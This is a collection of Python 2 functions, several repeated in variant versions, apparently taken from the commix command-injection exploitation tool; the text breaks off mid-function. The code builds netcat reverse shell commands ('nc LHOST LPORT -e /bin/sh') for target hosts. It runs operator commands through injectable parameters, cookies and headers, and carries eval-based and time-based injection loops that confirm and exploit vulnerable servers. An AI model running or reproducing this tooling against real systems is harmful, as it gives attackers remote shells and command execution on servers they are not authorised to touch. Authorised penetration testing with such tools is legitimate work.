def input_cmd(http_request_method, url, vuln_parameter, ip_src): print "\nPseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower() in settings.SHELL_OPTIONS: if cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "quit": logs.logs_notification(filename) os._exit(0) elif cmd.lower() == "back": os._exit(0) else: pass else: cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src) except KeyboardInterrupt: print "" os._exit(0) except: print "" os._exit(0)
def reverse_tcp_options(lhost, lport): while True: reverse_tcp_option = raw_input(""" ---[ """ + Style.BRIGHT + Fore.BLUE + """Reverse TCP shells""" + Style.RESET_ALL + """ ]--- Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use a Netcat reverse TCP shell. Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' for other reverse TCP shells. commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp""" + Style.RESET_ALL + """) > """) # Option 1 - Netcat shell if reverse_tcp_option == '1' : reverse_tcp_option = netcat_version(lhost, lport) break # Option 2 - Other (Netcat-Without-Netcat) shells elif reverse_tcp_option == '2' : reverse_tcp_option = other_reverse_shells(lhost, lport) break elif reverse_tcp_option.lower() == "reverse_tcp": print Fore.YELLOW + "(^) Warning: You are already into the 'reverse_tcp' mode." + Style.RESET_ALL continue elif reverse_tcp_option.lower() == "?": menu.shell_options() continue elif reverse_tcp_option.lower() in settings.SHELL_OPTIONS: return reverse_tcp_option else: print Back.RED + "(x) Error: The '" + reverse_tcp_option + "' option, is not valid." + Style.RESET_ALL continue return reverse_tcp_option
def reverse_tcp_options(lhost, lport): while True: reverse_tcp_option = raw_input(""" Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use a Netcat reverse TCP shell. Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' for other reverse TCP shells. commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp""" + Style.RESET_ALL + """) > """) # Option 1 - Netcat shell if reverse_tcp_option == '1' : reverse_tcp_option = netcat_version(lhost, lport) break # Option 2 - Other (Netcat-Without-Netcat) shells elif reverse_tcp_option == '2' : reverse_tcp_option = other_reverse_shells(lhost, lport) break elif reverse_tcp_option.lower() == "reverse_tcp": print Fore.YELLOW + "(^) Warning: You are already into the 'reverse_tcp' mode." + Style.RESET_ALL continue elif reverse_tcp_option.lower() == "?": menu.shell_options() continue elif reverse_tcp_option.lower() in settings.SHELL_OPTIONS: return reverse_tcp_option else: print Back.RED + "(x) Error: The '" + reverse_tcp_option + "' option, is not valid." + Style.RESET_ALL continue return reverse_tcp_option
def netcat_version(): # Netcat alternatives NETCAT_ALTERNATIVES = ["/bin/nc", "/bin/busybox nc", "/bin/nc.traditional"] while True: nc_version = raw_input(""" ---[ """ + Style.BRIGHT + Fore.BLUE + """Unix-like targets""" + Style.RESET_ALL + """ ]--- Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use the default Netcat on target host. Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' to use Netcat for Busybox on target host. Type '""" + Style.BRIGHT + """3""" + Style.RESET_ALL + """' to use Netcat-Traditional on target host. commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp_netcat""" + Style.RESET_ALL + """) > """) # Default Netcat if nc_version == '1': nc_alternative = NETCAT_ALTERNATIVES[0] break # Netcat for Busybox if nc_version == '2': nc_alternative = NETCAT_ALTERNATIVES[1] break # Netcat-Traditional elif nc_version == '3': nc_alternative = NETCAT_ALTERNATIVES[2] break elif nc_version.lower() == "reverse_tcp": warn_msg = "You are already into the 'reverse_tcp' mode." print settings.print_warning_msg(warn_msg) continue elif nc_version.lower() == "?": menu.shell_options() continue elif nc_version.lower() in settings.SHELL_OPTIONS: return nc_version elif nc_version[0:3].lower() == "set": if nc_version[4:9].lower() == "lhost": check_lhost(nc_version[10:]) if nc_version[4:9].lower() == "lport": check_lport(nc_version[10:]) else: err_msg = "The '" + nc_version + "' option, is not valid." print settings.print_error_msg(err_msg) continue cmd = nc_alternative + " " + settings.LHOST + " " + settings.LPORT + " -e /bin/sh" return cmd
def check_os_shell_options(cmd, technique, go_back, no_result): if cmd in settings.SHELL_OPTIONS: if cmd == "?": menu.shell_options() elif cmd == "back": go_back = True if next_attack_vector(technique, go_back) == True: return "back" else: return False else: return cmd
def netcat_version(): # Netcat alternatives NETCAT_ALTERNATIVES = [ "/bin/nc", "/bin/busybox nc", "/bin/nc.traditional" ] while True: nc_version = raw_input(""" ---[ """ + Style.BRIGHT + Fore.BLUE + """Unix-like targets""" + Style.RESET_ALL + """ ]--- Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use the default Netcat on target host. Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' to use Netcat for Busybox on target host. Type '""" + Style.BRIGHT + """3""" + Style.RESET_ALL + """' to use Netcat-Traditional on target host. commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp_netcat""" + Style.RESET_ALL + """) > """) # Default Netcat if nc_version == '1': nc_alternative = NETCAT_ALTERNATIVES[0] break # Netcat for Busybox if nc_version == '2': nc_alternative = NETCAT_ALTERNATIVES[1] break # Netcat-Traditional elif nc_version == '3': nc_alternative = NETCAT_ALTERNATIVES[2] break elif nc_version.lower() == "reverse_tcp": warn_msg = "You are already into the 'reverse_tcp' mode." print settings.print_warning_msg(warn_msg) continue elif nc_version.lower() == "?": menu.shell_options() continue elif nc_version.lower() in settings.SHELL_OPTIONS: return nc_version elif nc_version[0:3].lower() == "set": if nc_version[4:9].lower() == "lhost": check_lhost(nc_version[10:]) if nc_version[4:9].lower() == "lport": check_lport(nc_version[10:]) else: err_msg = "The '" + nc_version + "' option, is not valid." print settings.print_error_msg(err_msg) continue cmd = nc_alternative + " " + settings.LHOST + " " + settings.LPORT + " -e /bin/sh" return cmd
def configure_reverse_tcp(): # Set up LHOST for The reverse TCP connection while True: lhost = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp_lhost""" + Style.RESET_ALL + """) > """) if lhost.lower() == "reverse_tcp": print Fore.YELLOW + "(^) Warning: You are already into the 'reverse_tcp' mode." + Style.RESET_ALL + "\n" continue elif lhost.lower() == "?": menu.shell_options() continue elif lhost.lower() in settings.SHELL_OPTIONS: lport = lhost return lhost, lport else: parts = lhost.split('.') if len(parts) == 4 and all(part.isdigit() for part in parts) and all( 0 <= int(part) <= 255 for part in parts): break else: print Back.RED + "(x) Error: The IP format is not valid." + Style.RESET_ALL continue # Set up LPORT for The reverse TCP connection while True: lport = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp_lport""" + Style.RESET_ALL + """) > """) if lport.lower() == "reverse_tcp": print Fore.YELLOW + "(^) Warning: You are already into the 'reverse_tcp' mode." + Style.RESET_ALL + "\n" continue elif lport.lower() == "?": menu.shell_options() continue elif lport.lower() in settings.SHELL_OPTIONS: lhost = lport return lhost, lport else: try: if float(lport): break except ValueError: print Back.RED + "(x) Error: The port must be numeric." + Style.RESET_ALL continue return lhost, lport
def netcat_version(lhost, lport): # Netcat alternatives NETCAT_ALTERNATIVES = ["/bin/nc", "/bin/busybox nc", "/bin/nc.traditional"] while True: nc_version = raw_input(""" ---[ """ + Style.BRIGHT + Fore.BLUE + """Unix-like targets""" + Style.RESET_ALL + """ ]--- Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use the default Netcat on target host. Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' to use Netcat for Busybox on target host. Type '""" + Style.BRIGHT + """3""" + Style.RESET_ALL + """' to use Netcat-Traditional on target host. commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp_netcat""" + Style.RESET_ALL + """) > """) # Default Netcat if nc_version == '1': nc_alternative = NETCAT_ALTERNATIVES[0] break # Netcat for Busybox if nc_version == '2': nc_alternative = NETCAT_ALTERNATIVES[1] break # Netcat-Traditional elif nc_version == '3': nc_alternative = NETCAT_ALTERNATIVES[2] break elif nc_version.lower() == "reverse_tcp": print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'reverse_tcp' mode." + Style.RESET_ALL continue elif nc_version.lower() == "?": menu.shell_options() continue elif nc_version.lower() in settings.SHELL_OPTIONS: return nc_version else: print Back.RED + settings.ERROR_SIGN + "The '" + nc_version + "' option, is not valid." + Style.RESET_ALL continue cmd = nc_alternative + " " + lhost + " " + lport + " -e /bin/sh" return cmd
def configure_reverse_tcp(): # Set up LHOST for The reverse TCP connection while True: lhost = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp_lhost""" + Style.RESET_ALL + """) > """) if lhost.lower() == "reverse_tcp": print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'reverse_tcp' mode." + Style.RESET_ALL + "\n" continue elif lhost.lower() == "?": menu.shell_options() continue elif lhost.lower() == "quit": sys.exit(0) elif lhost.lower() in settings.SHELL_OPTIONS: lport = lhost return lhost, lport else: parts = lhost.split('.') if len(parts) == 4 and all(part.isdigit() for part in parts) and all(0 <= int(part) <= 255 for part in parts): break else: print Back.RED + settings.ERROR_SIGN + "The IP format is not valid." + Style.RESET_ALL continue # Set up LPORT for The reverse TCP connection while True: lport = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp_lport""" + Style.RESET_ALL + """) > """) if lport.lower() == "reverse_tcp": print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'reverse_tcp' mode." + Style.RESET_ALL + "\n" continue elif lport.lower() == "?": menu.shell_options() continue elif lhost.lower() == "quit": sys.exit(0) elif lport.lower() in settings.SHELL_OPTIONS: lhost = lport return lhost, lport else: try: if float(lport): break except ValueError: print Back.RED + settings.ERROR_SIGN + "The port must be numeric." + Style.RESET_ALL continue return lhost, lport
def netcat_version(lhost, lport): # Netcat alternatives NETCAT_ALTERNATIVES = [ "/bin/nc", "/bin/busybox nc", "/bin/nc.traditional" ] while True: nc_version = raw_input(""" ---[ """ + Style.BRIGHT + Fore.BLUE + """Unix-like targets""" + Style.RESET_ALL + """ ]--- Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use the default Netcat on target host. Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' to use Netcat for Busybox on target host. Type '""" + Style.BRIGHT + """3""" + Style.RESET_ALL + """' to use Netcat-Traditional on target host. commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp_netcat""" + Style.RESET_ALL + """) > """) # Default Netcat if nc_version == '1': nc_alternative = NETCAT_ALTERNATIVES[0] break # Netcat for Busybox if nc_version == '2': nc_alternative = NETCAT_ALTERNATIVES[1] break # Netcat-Traditional elif nc_version == '3': nc_alternative = NETCAT_ALTERNATIVES[2] break elif nc_version.lower() == "reverse_tcp": print Fore.YELLOW + "(^) Warning: You are already into the 'reverse_tcp' mode." + Style.RESET_ALL continue elif nc_version.lower() == "?": menu.shell_options() continue elif nc_version.lower() in settings.SHELL_OPTIONS: return nc_version else: print Back.RED + "(x) Error: The '" + nc_version + "' option, is not valid." + Style.RESET_ALL continue cmd = nc_alternative + " " + lhost + " " + lport + " -e /bin/sh" return cmd
def reverse_tcp_options(): while True: reverse_tcp_option = raw_input(""" ---[ """ + Style.BRIGHT + Fore.BLUE + """Reverse TCP shells""" + Style.RESET_ALL + """ ]--- Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use a Netcat reverse TCP shell. Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' for other reverse TCP shells. commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp""" + Style.RESET_ALL + """) > """) # Option 1 - Netcat shell if reverse_tcp_option == '1': reverse_tcp_option = netcat_version() break # Option 2 - Other (Netcat-Without-Netcat) shells elif reverse_tcp_option == '2': reverse_tcp_option = other_reverse_shells() break elif reverse_tcp_option.lower() == "reverse_tcp": warn_msg = "You are already into the 'reverse_tcp' mode." print settings.print_warning_msg(warn_msg) continue elif reverse_tcp_option.lower() == "?": menu.shell_options() continue elif reverse_tcp_option.lower() == "quit": sys.exit(0) elif reverse_tcp_option.lower() in settings.SHELL_OPTIONS: return reverse_tcp_option elif reverse_tcp_option[0:3].lower() == "set": if reverse_tcp_option[4:9].lower() == "lhost": check_lhost(reverse_tcp_option[10:]) if reverse_tcp_option[4:9].lower() == "lport": check_lport(reverse_tcp_option[10:]) else: err_msg = "The '" + reverse_tcp_option + "' option, is not valid." print settings.print_error_msg(err_msg) continue return reverse_tcp_option
def configure_reverse_tcp(): # Set up LHOST for the reverse TCP connection while True: option = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp""" + Style.RESET_ALL + """) > """) if option.lower() == "reverse_tcp": warn_msg = "You are already into the 'reverse_tcp' mode." print settings.print_warning_msg(warn_msg) + "\n" continue elif option.lower() == "?": menu.shell_options() continue elif option.lower() == "quit": sys.exit(0) elif option[0:3].lower() == "set": if option[4:9].lower() == "lhost": if check_lhost(option[10:]): if len(settings.LPORT) == 0: pass else: break else: continue if option[4:9].lower() == "lport": if check_lport(option[10:]): if len(settings.LHOST) == 0: pass else: break else: continue elif option.lower() == "os_shell" or option.lower() == "back": settings.REVERSE_TCP = False break else: err_msg = "The '" + option + "' option, is not valid." print settings.print_error_msg(err_msg) pass # eof
def reverse_tcp_options(): while True: reverse_tcp_option = raw_input(""" ---[ """ + Style.BRIGHT + Fore.BLUE + """Reverse TCP shells""" + Style.RESET_ALL + """ ]--- Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use a Netcat reverse TCP shell. Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' for other reverse TCP shells. commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp""" + Style.RESET_ALL + """) > """) # Option 1 - Netcat shell if reverse_tcp_option == '1' : reverse_tcp_option = netcat_version() break # Option 2 - Other (Netcat-Without-Netcat) shells elif reverse_tcp_option == '2' : reverse_tcp_option = other_reverse_shells() break elif reverse_tcp_option.lower() == "reverse_tcp": warn_msg = "You are already into the 'reverse_tcp' mode." print settings.print_warning_msg(warn_msg) continue elif reverse_tcp_option.lower() == "?": menu.shell_options() continue elif reverse_tcp_option.lower() == "quit": sys.exit(0) elif reverse_tcp_option.lower() in settings.SHELL_OPTIONS: return reverse_tcp_option elif reverse_tcp_option[0:3].lower() == "set": if reverse_tcp_option[4:9].lower() == "lhost": check_lhost(reverse_tcp_option[10:]) if reverse_tcp_option[4:9].lower() == "lport": check_lport(reverse_tcp_option[10:]) else: err_msg = "The '" + reverse_tcp_option + "' option, is not valid." print settings.print_error_msg(err_msg) continue return reverse_tcp_option
def configure_reverse_tcp(): # Set up LHOST for the reverse TCP connection while True: option = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp""" + Style.RESET_ALL + """) > """) if option.lower() == "reverse_tcp": warn_msg = "You are already into the 'reverse_tcp' mode." print settings.print_warning_msg(warn_msg)+ "\n" continue elif option.lower() == "?": menu.shell_options() continue elif option.lower() == "quit": sys.exit(0) elif option[0:3].lower() == "set": if option[4:9].lower() == "lhost": if check_lhost(option[10:]): if len(settings.LPORT) == 0: pass else: break else: continue if option[4:9].lower() == "lport": if check_lport(option[10:]): if len(settings.LHOST) == 0: pass else: break else: continue elif option.lower() == "os_shell" or option.lower() == "back": settings.REVERSE_TCP = False break else: err_msg = "The '" + option + "' option, is not valid." print settings.print_error_msg(err_msg) pass # eof
def configure_reverse_tcp(): # Set up LHOST for the reverse TCP connection while True: option = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp""" + Style.RESET_ALL + """) > """) if option.lower() == "reverse_tcp": print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'reverse_tcp' mode." + Style.RESET_ALL + "\n" continue elif option.lower() == "?": menu.shell_options() continue elif option.lower() == "quit": sys.exit(0) elif option[0:3].lower() == "set": if option[4:9].lower() == "lhost": if check_lhost(option[10:]): if len(settings.LPORT) == 0: pass else: break else: continue if option[4:9].lower() == "lport": if check_lport(option[10:]): if len(settings.LHOST) == 0: pass else: break else: continue elif option.lower() == "os_shell" or "back": settings.REVERSE_TCP = False break else: print Back.RED + settings.ERROR_SIGN + "The '" + option + "' option, is not valid." + Style.RESET_ALL pass # eof
def input_cmd(http_request_method, url, vuln_parameter, ip_src, technique): err_msg = "" if menu.enumeration_options(): err_msg += "enumeration" if menu.file_access_options(): if err_msg != "": err_msg = err_msg + " and " err_msg = err_msg + "file-access" if err_msg != "": print Fore.YELLOW + settings.WARNING_SIGN + "The " + err_msg + " options are not supported by this module because of the structure of the exfiltrated data. Please try using any unix-like commands manually." + Style.RESET_ALL # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break gotshell = raw_input("\n" + settings.QUESTION_SIGN + "Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: if cmd.lower() == "quit" or cmd.lower() == "back": print "" os._exit(0) elif cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "os_shell": print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n" elif cmd.lower() == "reverse_tcp": print Fore.YELLOW + settings.WARNING_SIGN + "This option is not supported by this module." + Style.RESET_ALL + "\n" else: # Command execution results. cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src) except KeyboardInterrupt: print "" os._exit(0) except: print "" os._exit(0) elif gotshell in settings.CHOISE_NO: print "" os._exit(0) elif gotshell in settings.CHOISE_QUIT: print "" os._exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + settings.ERROR_SIGN + "'" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n" pass
def eb_injection_handler(url, delay, filename, http_request_method): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "Results-based Command Injection" technique = "eval-based injection technique" sys.stdout.write("(*) Testing the " + technique + "... ") sys.stdout.flush() i = 0 # Calculate all possible combinations total = len(settings.EVAL_PREFIXES) * len(settings.EVAL_SEPARATORS) * len( settings.EVAL_SUFFIXES) for prefix in settings.EVAL_PREFIXES: for suffix in settings.EVAL_SUFFIXES: for separator in settings.EVAL_SEPARATORS: i = i + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive results. TAG = ''.join( random.choice(string.ascii_uppercase) for i in range(6)) randv1 = random.randrange(100) randv2 = random.randrange(100) randvcalc = randv1 + randv2 try: # Eval-based decision payload (check if host is vulnerable). payload = eb_payloads.decision(separator, TAG, randv1, randv2) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, urllib.quote(suffix)) payload = payload + "" + TAG + "" payload = re.sub(" ", "%20", payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter( menu.options.cookie) response = eb_injector.cookie_injection_test( url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter( menu.options.agent) response = eb_injector.user_agent_injection_test( url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter( menu.options.referer) response = eb_injector.referer_injection_test( url, vuln_parameter, payload) else: found_cookie_injection = False # Check if target host is vulnerable. response, vuln_parameter = eb_injector.injection_test( payload, http_request_method, url) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Evaluate test results. shell = eb_injector.injection_test_results( response, TAG, randvcalc) if not menu.options.verbose: percent = ((i * 100) / total) if percent == 100: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(percent) + "%" elif len(shell) != 0: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(percent) + "%" sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except: continue # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param( url) else: found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0: found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.upload_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The (" + http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to " + injection_type + "." + Style.RESET_ALL print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title( ) + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub( "%20", " ", payload) + Style.RESET_ALL # Check for any enumeration options. eb_enumeration.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter) # Check for any system file access options. eb_file_access.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter) # Check if defined single cmd. if menu.options.os_cmd: eb_enumeration.single_os_cmd_exec( separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter) # Pseudo-Terminal shell go_back = False while True: if go_back == True: break gotshell = raw_input( "\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > " ).lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower() in settings.SHELL_OPTIONS: if cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "quit": logs.logs_notification(filename) sys.exit(0) elif cmd.lower() == "back": go_back = True break else: pass else: # The main command injection exploitation. response = eb_injector.injection( separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Command execution results. shell = eb_injector.injection_results( response, TAG) if shell: shell = "".join( str(p) for p in shell).replace( " ", "", 1)[:-1] if shell != "": print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise elif gotshell in settings.CHOISE_NO: if menu.options.verbose: sys.stdout.write( "\r(*) Continue testing the " + technique + "... ") sys.stdout.flush() break else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass if no_result == True: print "" return False else: sys.stdout.write("\r") sys.stdout.flush()
def tb_injection_handler(url, delay, filename, http_request_method, url_time_response): percent = 0 counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False export_injection_info = False injection_type = "Blind-based Command Injection" technique = "time-based injection technique" # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = settings.MAXLEN # Check if defined "--url-reload" option. if menu.options.url_reload == True: print Fore.YELLOW + "(^) Warning: The '--url-reload' option is not available in "+ technique +"." + Style.RESET_ALL percent = str(percent)+"%" sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() # Calculate all possible combinations total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION)) for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Define alter shell alter_shell = menu.options.alter_shell # Change TAG on every request to prevent false-positive results. TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6)) tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: if alter_shell: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision_alter_shell(separator, TAG, output_length, delay, http_request_method) else: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision(separator, TAG, output_length, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) how_long = tb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) how_long = tb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) how_long = tb_injector.referer_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tb_injector.injection_test(payload, http_request_method, url) # Injection percentage calculation percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total * 1.0)),2)) if percent == 100 and no_result == True: if not menu.options.verbose: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = "" else: if (url_time_response <= 1 and how_long >= delay) or \ (url_time_response >= 2 and how_long > delay): # Time relative false positive fixation. if len(TAG) == output_length: randv1 = random.randrange(0, 1) randv2 = random.randrange(1, 2) randvcalc = randv1 + randv2 cmd = "(" + str(randv1) + "+" + str(randv2) + ")" # Check for false positive resutls output = tb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell) if str(output) == str(randvcalc) and len(TAG) == output_length: if not menu.options.verbose: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = "" else: break else: percent = str(float_percent)+"%" if not menu.options.verbose: sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except: break # Yaw, got shellz! # Do some magic tricks! if (url_time_response <= 1 and how_long >= delay) or \ (url_time_response >= 2 and how_long > delay): if len(TAG) == output_length : found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL # Check for any enumeration options. if settings.ENUMERATION_DONE == True : while True: enumerate_again = raw_input("\n(?) Do you want to enumerate again? [Y/n/q] > ").lower() if enumerate_again in settings.CHOISE_YES: tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : while True: 